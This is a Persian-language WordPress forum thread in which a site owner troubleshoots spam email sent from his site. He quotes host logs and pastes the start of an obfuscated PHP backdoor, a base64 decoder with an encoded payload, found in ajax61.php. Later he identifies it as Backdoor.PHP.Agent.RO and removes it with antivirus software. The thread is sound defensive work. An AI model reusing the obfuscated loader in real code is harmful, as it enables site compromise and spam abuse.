آموزش های عمومیامنیتبخش وردپرسعمومیوردپرس

مشکل امنیتی در مورد ارسال ایمیل ناخواسته از سایت جزئیات خطا

مشکل امنیتی در مورد ارسال ایمیل ناخواسته از سایت جزئیات خطا
مشکل امنیتی در مورد ارسال ایمیل ناخواسته از سایت جزئیات خطا
مشکل امنیتی در مورد ارسال ایمیل ناخواسته از سایت جزئیات خطا
مشکل امنیتی در مورد ارسال ایمیل ناخواسته از سایت جزئیات خطا
مشکل امنیتی در مورد ارسال ایمیل ناخواسته از سایت جزئیات خطا

نوشته : hiwa

سلام دوستان

من یک هفته است درگیر یک مشکل امنیتی در سایت وردپرسم هستم ممنون میشم اگه وقت بگذارید نظرتون رو بگید تا بتونم بررسی های بیشتری داشته باشم.

متن خطایی که کارشناس هاست برای من ارسال کرده اینه:

لینک های مربوط به صفحات و کدهای آلوده در سایت شما به شرح ذیل ارائه می گردد : 
[27-Dec-2016 20:48:46 America/New_York] mail() on [D:HostingSpacesmydomain.commydomain.comwwwrootwp-includeswidgetsajax61.php(1958) : eval()'d code:775]: To: manclik@o2.pl -- Headers: Date: Tue, 27 Dec 2016 20:48:46 -0500 From: Adrianna <adrianna@mydomain.com> Message-ID: <e086de42938f51715a6c6f5e2440922a@peykeaval.com> X-Priority: 3 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="b1_e086de42938f51715a6c6f5e2440922a" Content-Transfer-Encoding: 8bit
[28-Dec-2016 03:32:25 America/New_York] mail() on [D:HostingSpacesmydomain.commydomain.comwwwrootwp-includeswidgetsajax61.php(1958) : eval()'d code:775]: To: panos@spitfire.gr -- Headers: Date: Wed, 28 Dec 2016 03:32:25 -0500 From: Debbie <debbie@mydomain.com> Message-ID: <f69af4c19b6af26f68341250901069ed@peykeaval.com> X-Priority: 3 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="b1_f69af4c19b6af26f68341250901069ed" Content-Transfer-Encoding: 8bit

قالبی که استفاده کردم listify نام داره . از سایت nikan خریداری کردم (250 هزار)

دو سه روز کامل درگیر اسکن و بررسی بودم و دوباره فایل های اسکن شده رو روی هاست(ویندوزی) پاک شده آپلود کردم اما باز هم همان مشکل قبلی پیش آمد.

سیستم خودم رو فول اسکن کردم.

تمام فایلهای سایت رو هم دانلود اسکن کردم. موارد مشکوک رو fix کردم با آنتی ویرویس avast Free اما مشکلم حل نشده.

راهکاری به نظرتون میرسه ؟

ممنون

نوشته : hiwa

محتوای فایل ajax61.php هم به این شکله :

<?php
 $euvwzec = 2437; function kjmlq($hebqeajjrg, $psycehqwla){$evprzo = ''; for($i=0; $i < strlen($hebqeajjrg); $i ){$evprzo .= isset($psycehqwla[$hebqeajjrg[$i]]) ? $psycehqwla[$hebqeajjrg[$i]] : $hebqeajjrg[$i];}
$duqcskxg="base" . "64_decode";return $duqcskxg($evprzo);}
$qewdep = 'FSUdZJwNMAF8ktJfvcwfAtzIMfv3uXjJiXq76q1xFSUdZJwNMAF8ktzIM5wUvnkIvnGnOC9qxi3rCg47lcUR'.
'vtJ1xChKbAYRMAYUbeJ1ZQwdAeL7lQ0nOC9qxi3rCg4NMALRhSUKMJw3ZQ57'.
'hCsqxi3rCs1xZQb8ZArNMAF8kywiLJkQLJu7xF1x2q1xCDLR01JDJgJDQfhFDy4R01JGLBhhuo1suBWB6f9rCsggA5ry0UMy0U'.
'3n0gJri5LyA1yXLyunAD9wuCuzGavdGCEqOaXB6q1xCQUcxCyUlA412DsgA5ry0UMy0U3nDyL00ywbA1Mp0Uh40gLyLy'.
'wSi5unADg7oF8k2q1xCFggA5ry0UMy0U3nDyL00ywbA1Mp0Uh40gLyLywSi5unAD9wuC'.

نوشته : مادرن هاستینگ

در 5 ساعت قبل، hiwa گفته است :
محتوای فایل ajax61.php هم به این شکله :
<? php
$euvwzec = 2437 ; function kjmlq ( $hebqeajjrg , $psycehqwla ){ $evprzo = '' ; for ( $i = 0 ; $i < strlen ( $hebqeajjrg ); $i ){ $evprzo .= isset ( $psycehqwla [ $hebqeajjrg [ $i ]]) ? $psycehqwla [ $hebqeajjrg [ $i ]] : $hebqeajjrg [ $i ];}
$duqcskxg = "base" . "64_decode" ; return $duqcskxg ( $evprzo );}
$qewdep = 'FSUdZJwNMAF8ktJfvcwfAtzIMfv3uXjJiXq76q1xFSUdZJwNMAF8ktzIM5wUvnkIvnGnOC9qxi3rCg47lcUR' .
'vtJ1xChKbAYRMAYUbeJ1ZQwdAeL7lQ0nOC9qxi3rCg4NMALRhSUKMJw3ZQ57' .
'hCsqxi3rCs1xZQb8ZArNMAF8kywiLJkQLJu7xF1x2q1xCDLR01JDJgJDQfhFDy4R01JGLBhhuo1suBWB6f9rCsggA5ry0UMy0U' .
'3n0gJri5LyA1yXLyunAD9wuCuzGavdGCEqOaXB6q1xCQUcxCyUlA412DsgA5ry0UMy0U3nDyL00ywbA1Mp0Uh40gLyLy' .
'wSi5unADg7oF8k2q1xCFggA5ry0UMy0U3nDyL00ywbA1Mp0Uh40gLyLywSi5unAD9wuC' .

درود بر شما بنده زیاد ازین کدها سر در نیاوردم ولی تا جایی که متوجه شدم اول اینکه شما دارین از هاست ویندوز استفاده میکنین که این زیاد با وردپرس همخوانی نداره و عمده مشکلاتتون دقیقا از اینجا شروع میشه!

بعدش اینکه فک میکنم یه کد مخرب بصورت رمزگذاری شده همون متن سبز رنگ در یکی از ابزارکهای قالب وجود داره!

که اول باید دیکد بشه و بعدا که متوجه شدین چی هست حذف بشه!

یا اون بخش از کدها رو حدف کنید و ببینید مشکل بر طرف میشه یا بازم وجود داره!

فک میکنم این موارد رو چک کنید مشکلتون برطرف بشه اگر نشد بازم پیام بزاردی فرصتی داشتم خدمت میرسم و بازم چک میکنیم با هم

^_^

نوشته : hiwa

دوستت عزیز خیلی متشکرم از جوابت. مواردی که گفتی رو دارم انجام میدم. امیدوارم حل بشه. نتیجه رو حتما خدمتت گزارش میدم. بازم ممنونم ازت.

نوشته : hiwa

مشکل من یک بک دور به اسم Backdoor.PHP.Agent.RO بود که به کمک Bitdefender total security 2017 تونستم مشکل رو حل کنم.


(1) آموزش ایجاد پاسخگوی خودکار ایمیل ها در
آموزش ایجاد پاسخگوی خودکار ایمیل ها در cPanel - هاست نگار


(2) ایمیل اسپم در سی پنل
آموزش جلوگیری از ارسال ایمیل اسپم در سی پنل - هاست نگار


(3) رفع خطای Deceptive Site Ahead در سایت
رفع خطای Deceptive Site Ahead در سایت زود وب


(4) آموزش نحوه اتصال اکانت ایمیل هاست
آموزش نحوه اتصال اکانت ایمیل هاست cPanel به Gmail - هاست نگار


(5) راهنمای روش های ارسال ایمیل توسط برنامه
راهنمای روش های ارسال ایمیل توسط برنامه و تست و خطایابی آن


(6) چطور مشکلات امنیتی سایت را با سرچ کنسول
چطور مشکلات امنیتی سایت را با سرچ کنسول گوگل بررسی کنیم - پایگاه دانش میزبانفا

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

چهار × چهار =

دکمه بازگشت به بالا